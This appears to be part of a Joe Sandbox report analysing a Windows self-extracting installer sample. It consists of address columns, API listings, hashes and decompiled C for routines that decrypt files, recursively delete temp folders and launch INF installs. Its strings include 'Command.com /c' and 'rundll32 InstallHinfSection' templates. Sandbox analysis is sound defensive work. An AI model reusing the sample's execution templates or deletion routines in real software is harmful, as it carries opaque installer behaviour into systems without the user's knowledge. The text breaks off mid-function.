                                                                                                                                                                                                                                                0x00021e28
                                                                                                                                                                                                                                                0x00021e37
                                                                                                                                                                                                                                                0x00021e3e
                                                                                                                                                                                                                                                0x00021e52
                                                                                                                                                                                                                                                0x00021e60
                                                                                                                                                                                                                                                0x00021e60
                                                                                                                                                                                                                                                0x00021e3e
                                                                                                                                                                                                                                                0x00021e79
                                                                                                                                                                                                                                                0x00021e7b
                                                                                                                                                                                                                                                0x00021e84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021d9b
                                                                                                                                                                                                                                                0x00021d9b
                                                                                                                                                                                                                                                0x00021da0
                                                                                                                                                                                                                                                0x00021da2
                                                                                                                                                                                                                                                0x00021da5
                                                                                                                                                                                                                                                0x00021da5
                                                                                                                                                                                                                                                0x00021da7
                                                                                                                                                                                                                                                0x00021da8
                                                                                                                                                                                                                                                0x00021dac
                                                                                                                                                                                                                                                0x00021dae
                                                                                                                                                                                                                                                0x00021db4
                                                                                                                                                                                                                                                0x00021db7
                                                                                                                                                                                                                                                0x00021db7
                                                                                                                                                                                                                                                0x00021db9
                                                                                                                                                                                                                                                0x00021dba
                                                                                                                                                                                                                                                0x00021dbe
                                                                                                                                                                                                                                                0x00021dc3
                                                                                                                                                                                                                                                0x00021dce
                                                                                                                                                                                                                                                0x00021dd2
                                                                                                                                                                                                                                                0x00021deb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021df0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021dd2
                                                                                                                                                                                                                                                0x00021bf7
                                                                                                                                                                                                                                                0x00021bfe
                                                                                                                                                                                                                                                0x00021c07
                                                                                                                                                                                                                                                0x00021d55
                                                                                                                                                                                                                                                0x00021d5a
                                                                                                                                                                                                                                                0x00021d5b
                                                                                                                                                                                                                                                0x00021d5d
                                                                                                                                                                                                                                                0x00021d5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021c1b
                                                                                                                                                                                                                                                0x00021c1b
                                                                                                                                                                                                                                                0x00021c20
                                                                                                                                                                                                                                                0x00021c2c
                                                                                                                                                                                                                                                0x00021c33
                                                                                                                                                                                                                                                0x00021c38
                                                                                                                                                                                                                                                0x00021c3a
                                                                                                                                                                                                                                                0x00021c3a
                                                                                                                                                                                                                                                0x00021c40
                                                                                                                                                                                                                                                0x00021c4b
                                                                                                                                                                                                                                                0x00021c4b
                                                                                                                                                                                                                                                0x00021c5d
                                                                                                                                                                                                                                                0x00021c61
                                                                                                                                                                                                                                                0x00021dd4
                                                                                                                                                                                                                                                0x00021dd4
                                                                                                                                                                                                                                                0x00021dd6
                                                                                                                                                                                                                                                0x00021ddb
                                                                                                                                                                                                                                                0x00021ddc
                                                                                                                                                                                                                                                0x00021dde
                                                                                                                                                                                                                                                0x00021d64
                                                                                                                                                                                                                                                0x00021d64
                                                                                                                                                                                                                                                0x00021d67
                                                                                                                                                                                                                                                0x00021d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021c67
                                                                                                                                                                                                                                                0x00021c67
                                                                                                                                                                                                                                                0x00021c6d
                                                                                                                                                                                                                                                0x00021c72
                                                                                                                                                                                                                                                0x00021c74
                                                                                                                                                                                                                                                0x00021c74
                                                                                                                                                                                                                                                0x00021c8e
                                                                                                                                                                                                                                                0x00021c99
                                                                                                                                                                                                                                                0x00021cc0
                                                                                                                                                                                                                                                0x00021cf8
                                                                                                                                                                                                                                                0x00021d07
                                                                                                                                                                                                                                                0x00021d23
                                                                                                                                                                                                                                                0x00021d09
                                                                                                                                                                                                                                                0x00021d14
                                                                                                                                                                                                                                                0x00021d1b
                                                                                                                                                                                                                                                0x00021d1b
                                                                                                                                                                                                                                                0x00021d2b
                                                                                                                                                                                                                                                0x00021d2d
                                                                                                                                                                                                                                                0x00021d2d
                                                                                                                                                                                                                                                0x00021d38
                                                                                                                                                                                                                                                0x00021d39
                                                                                                                                                                                                                                                0x00021d46
                                                                                                                                                                                                                                                0x00021cc2
                                                                                                                                                                                                                                                0x00021cc2
                                                                                                                                                                                                                                                0x00021ccc
                                                                                                                                                                                                                                                0x00021cce
                                                                                                                                                                                                                                                0x00021cce
                                                                                                                                                                                                                                                0x00021cdb
                                                                                                                                                                                                                                                0x00021ce6
                                                                                                                                                                                                                                                0x00021cee
                                                                                                                                                                                                                                                0x00021cee
                                                                                                                                                                                                                                                0x00021e89
                                                                                                                                                                                                                                                0x00021e91
                                                                                                                                                                                                                                                0x00021e92
                                                                                                                                                                                                                                                0x00021e94
                                                                                                                                                                                                                                                0x00021e97
                                                                                                                                                                                                                                                0x00021ea4
                                                                                                                                                                                                                                                0x00021ea4
                                                                                                                                                                                                                                                0x00021c61
                                                                                                                                                                                                                                                0x00021c07
                                                                                                                                                                                                                                                0x00021bd3
                                                                                                                                                                                                                                                0x00021b7b

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00021BE7
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00021BFE
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00021C57
                                                                                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 00021C88
                                                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00021140,00000000,00000008,?), ref: 00021CB8
                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32 ref: 00021D1B
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                • API String ID: 383838535-2145762761
                                                                                                                                                                                                                                                • Opcode ID: cfc259eac6d7ee3083220e355b50835203fec8f64eb2c181b341bc6892cd552e
                                                                                                                                                                                                                                                • Instruction ID: 140f24f5848d846a813fb6daf4d4313087b6456f7322ec60d95674c6d55aa7b2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc259eac6d7ee3083220e355b50835203fec8f64eb2c181b341bc6892cd552e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33A16B70A002386BEF709B24FC45FEA77B9DB71310F2442A5E555A72C1DBB49E86CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00022F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 450 22f1d-22f3d 451 22f3f-22f46 450->451 452 22f6c-22f73 call 25164 450->452 454 22f48 call 251e5 451->454 455 22f5f-22f66 call 23a3f 451->455 459 23041 452->459 460 22f79-22f80 call 255a0 452->460 461 22f4d-22f4f 454->461 455->452 455->459 464 23043-23053 call 26ce0 459->464 460->459 468 22f86-22fbe GetSystemDirectoryA call 2658a LoadLibraryA 460->468 461->459 465 22f55-22f5d 461->465 465->452 465->455 472 22fc0-22fd4 GetProcAddress 468->472 473 22ff7-23004 FreeLibrary 468->473 472->473 474 22fd6-22fee DecryptFileA 472->474 475 23006-2300c 473->475 476 23017-23024 SetCurrentDirectoryA 473->476 474->473 489 22ff0-22ff5 474->489 475->476 479 2300e call 2621e 475->479 477 23026-2303c call 244b9 call 26285 476->477 478 23054-2305a 476->478 477->459 483 23065-2306c 478->483 484 2305c call 23b26 478->484 485 23013-23015 479->485 486 2306e-23075 call 2256d 483->486 487 2307c-23089 483->487 495 23061-23063 484->495 485->459 485->476 496 2307a 486->496 492 230a1-230a9 487->492 493 2308b-23091 487->493 489->473 499 230b4-230b7 492->499 500 230ab-230ad 492->500 493->492 497 23093 call 23ba2 493->497 495->459 495->483 496->487 503 23098-2309a 497->503 499->464 500->499 502 230af call 24169 500->502 502->499 503->459 505 2309c 503->505 505->492
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00022F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x28004; // 0xf4950d3e
				_v8 = _t9 ^ _t46;
				if( *0x28a38 != 0) {
					L5:
					_t11 = E00025164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00026CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E000255A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0002658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x2a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x28a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x28a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x28d48 & 0x000000c0;
									if(( *0x28d48 & 0x000000c0) == 0) {
										_t41 =  *0x29a40; // 0x3, executed
										_t26 = E0002256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x28a24; // 0x0
									 *0x29a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x28a38;
										if( *0x28a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00024169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x29a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00023BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x28a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00023B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E000244B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x29124 = E00026285();
							goto L16;
						}
						_t59 =  *0x29a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0002621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x28a24;
				if( *0x28a24 != 0) {
					L4:
					_t34 = E00023A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E000251E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x28a38;
				if( *0x28a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                                                                0x00022f1d
                                                                                                                                                                                                                                                0x00022f28
                                                                                                                                                                                                                                                0x00022f2f
                                                                                                                                                                                                                                                0x00022f3d
                                                                                                                                                                                                                                                0x00022f6c
                                                                                                                                                                                                                                                0x00022f6c
                                                                                                                                                                                                                                                0x00022f71
                                                                                                                                                                                                                                                0x00022f73
                                                                                                                                                                                                                                                0x00023041
                                                                                                                                                                                                                                                0x00023041
                                                                                                                                                                                                                                                0x00023043
                                                                                                                                                                                                                                                0x00023053
                                                                                                                                                                                                                                                0x00023053
                                                                                                                                                                                                                                                0x00022f79
                                                                                                                                                                                                                                                0x00022f80
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022f86
                                                                                                                                                                                                                                                0x00022f86
                                                                                                                                                                                                                                                0x00022f93
                                                                                                                                                                                                                                                0x00022f9e
                                                                                                                                                                                                                                                0x00022fa0
                                                                                                                                                                                                                                                0x00022fa6
                                                                                                                                                                                                                                                0x00022fb8
                                                                                                                                                                                                                                                0x00022fba
                                                                                                                                                                                                                                                0x00022fbe
                                                                                                                                                                                                                                                0x00022fc6
                                                                                                                                                                                                                                                0x00022fcc
                                                                                                                                                                                                                                                0x00022fd4
                                                                                                                                                                                                                                                0x00022fd6
                                                                                                                                                                                                                                                0x00022fd8
                                                                                                                                                                                                                                                0x00022fe0
                                                                                                                                                                                                                                                0x00022fe6
                                                                                                                                                                                                                                                0x00022fee
                                                                                                                                                                                                                                                0x00022ff0
                                                                                                                                                                                                                                                0x00022ff5
                                                                                                                                                                                                                                                0x00022ff5
                                                                                                                                                                                                                                                0x00022fee
                                                                                                                                                                                                                                                0x00022fd4
                                                                                                                                                                                                                                                0x00022ff8
                                                                                                                                                                                                                                                0x00022ffe
                                                                                                                                                                                                                                                0x00023004
                                                                                                                                                                                                                                                0x00023017
                                                                                                                                                                                                                                                0x0002301c
                                                                                                                                                                                                                                                0x00023024
                                                                                                                                                                                                                                                0x00023054
                                                                                                                                                                                                                                                0x0002305a
                                                                                                                                                                                                                                                0x00023065
                                                                                                                                                                                                                                                0x00023065
                                                                                                                                                                                                                                                0x0002306c
                                                                                                                                                                                                                                                0x0002306e
                                                                                                                                                                                                                                                0x00023075
                                                                                                                                                                                                                                                0x0002307a
                                                                                                                                                                                                                                                0x0002307a
                                                                                                                                                                                                                                                0x0002307c
                                                                                                                                                                                                                                                0x00023081
                                                                                                                                                                                                                                                0x00023087
                                                                                                                                                                                                                                                0x00023089
                                                                                                                                                                                                                                                0x000230a1
                                                                                                                                                                                                                                                0x000230a1
                                                                                                                                                                                                                                                0x000230a9
                                                                                                                                                                                                                                                0x000230ab
                                                                                                                                                                                                                                                0x000230ad
                                                                                                                                                                                                                                                0x000230af
                                                                                                                                                                                                                                                0x000230af
                                                                                                                                                                                                                                                0x000230ad
                                                                                                                                                                                                                                                0x000230b6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002308b
                                                                                                                                                                                                                                                0x0002308b
                                                                                                                                                                                                                                                0x00023091
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023093
                                                                                                                                                                                                                                                0x00023098
                                                                                                                                                                                                                                                0x0002309a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002309c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002309c
                                                                                                                                                                                                                                                0x00023089
                                                                                                                                                                                                                                                0x0002305c
                                                                                                                                                                                                                                                0x00023061
                                                                                                                                                                                                                                                0x00023063
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023063
                                                                                                                                                                                                                                                0x0002302b
                                                                                                                                                                                                                                                0x00023032
                                                                                                                                                                                                                                                0x0002303c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002303c
                                                                                                                                                                                                                                                0x00023006
                                                                                                                                                                                                                                                0x0002300c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002300e
                                                                                                                                                                                                                                                0x00023015
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023015
                                                                                                                                                                                                                                                0x00022f80
                                                                                                                                                                                                                                                0x00022f3f
                                                                                                                                                                                                                                                0x00022f46
                                                                                                                                                                                                                                                0x00022f5f
                                                                                                                                                                                                                                                0x00022f5f
                                                                                                                                                                                                                                                0x00022f64
                                                                                                                                                                                                                                                0x00022f66
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022f66
                                                                                                                                                                                                                                                0x00022f4f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022f55
                                                                                                                                                                                                                                                0x00022f5d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00022F93
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00022FB2
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00022FC6
                                                                                                                                                                                                                                                • DecryptFileA.ADVAPI32 ref: 00022FE6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00022FF8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0002301C
                                                                                                                                                                                                                                                  • Part of subcall function 000251E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00022F4D,?,00000002,00000000), ref: 00025201
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 2126469477-4070797333
                                                                                                                                                                                                                                                • Opcode ID: bfa0d180740c4882d01b8b7f2a0bd1fd18646fe0d8b238dbb395a0fcf58ac091
                                                                                                                                                                                                                                                • Instruction ID: 4f9f8d62a29df92fd0fbe4f38dfb9a35c0611ecef57198854c67d9366021d47c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfa0d180740c4882d01b8b7f2a0bd1fd18646fe0d8b238dbb395a0fcf58ac091
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A341CB30A013359BFB70AB71BD966A673E89B54750F204075AE45D2192EF7CCE82CB71
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00022390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 648 22390-223b3 649 224cb-224df call 26ce0 648->649 650 223b9-223bc 648->650 650->649 652 223c2-22401 call 21680 call 216b3 FindFirstFileA 650->652 652->649 658 22407-2241f call 21680 652->658 661 22421-2242f lstrcmpA 658->661 662 22479-224a3 call 216b3 SetFileAttributesA DeleteFileA 658->662 664 22431-22443 lstrcmpA 661->664 665 224a9-224b7 FindNextFileA 661->665 662->665 664->665 668 22445-22477 call 216b3 call 2658a call 22390 664->668 665->658 667 224bd-224c5 FindClose RemoveDirectoryA 665->667 667->649 668->665
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E00022390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x28004; // 0xf4950d3e
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00026CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00021680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E000216B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00021680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E000216B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E000216B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0002658A( &_v280, 0x104, 0x21140);
								E00022390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                                                                0x00022398
                                                                                                                                                                                                                                                0x0002239e
                                                                                                                                                                                                                                                0x000223a3
                                                                                                                                                                                                                                                0x000223a5
                                                                                                                                                                                                                                                0x000223ae
                                                                                                                                                                                                                                                0x000223b3
                                                                                                                                                                                                                                                0x000224cb
                                                                                                                                                                                                                                                0x000224d2
                                                                                                                                                                                                                                                0x000224d3
                                                                                                                                                                                                                                                0x000224d4
                                                                                                                                                                                                                                                0x000224df
                                                                                                                                                                                                                                                0x000223c2
                                                                                                                                                                                                                                                0x000223d1
                                                                                                                                                                                                                                                0x000223db
                                                                                                                                                                                                                                                0x000223e4
                                                                                                                                                                                                                                                0x000223f6
                                                                                                                                                                                                                                                0x000223fc
                                                                                                                                                                                                                                                0x00022401
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022407
                                                                                                                                                                                                                                                0x00022407
                                                                                                                                                                                                                                                0x00022408
                                                                                                                                                                                                                                                0x00022411
                                                                                                                                                                                                                                                0x0002241f
                                                                                                                                                                                                                                                0x0002247a
                                                                                                                                                                                                                                                0x00022483
                                                                                                                                                                                                                                                0x00022495
                                                                                                                                                                                                                                                0x000224a3
                                                                                                                                                                                                                                                0x00022421
                                                                                                                                                                                                                                                0x0002242f
                                                                                                                                                                                                                                                0x00022453
                                                                                                                                                                                                                                                0x0002245d
                                                                                                                                                                                                                                                0x00022466
                                                                                                                                                                                                                                                0x00022472
                                                                                                                                                                                                                                                0x00022472
                                                                                                                                                                                                                                                0x0002242f
                                                                                                                                                                                                                                                0x000224af
                                                                                                                                                                                                                                                0x000224b5
                                                                                                                                                                                                                                                0x000224be
                                                                                                                                                                                                                                                0x000224c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000224c5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,00028A3A,000211F4,00028A3A,00000000,?,?), ref: 000223F6
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,000211F8), ref: 00022427
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,000211FC), ref: 0002243B
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00022495
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 000224A3
                                                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 000224AF
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 000224BE
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(00028A3A), ref: 000224C5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836429354-0
                                                                                                                                                                                                                                                • Opcode ID: c1b3ac11058ca83863f5a242395ac866d6450c92bb4f19343cee6c2c58974109
                                                                                                                                                                                                                                                • Instruction ID: 7fa2cbe0b13c78a1f449b1b397756f87c786a0b6aef30487b2b8904493e9ab9c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1b3ac11058ca83863f5a242395ac866d6450c92bb4f19343cee6c2c58974109
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B531A131204750ABD330EFA4EC89AEF73ECABC5315F14492EB55586291EF38990EC752
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00022BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                                                                			E00022BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
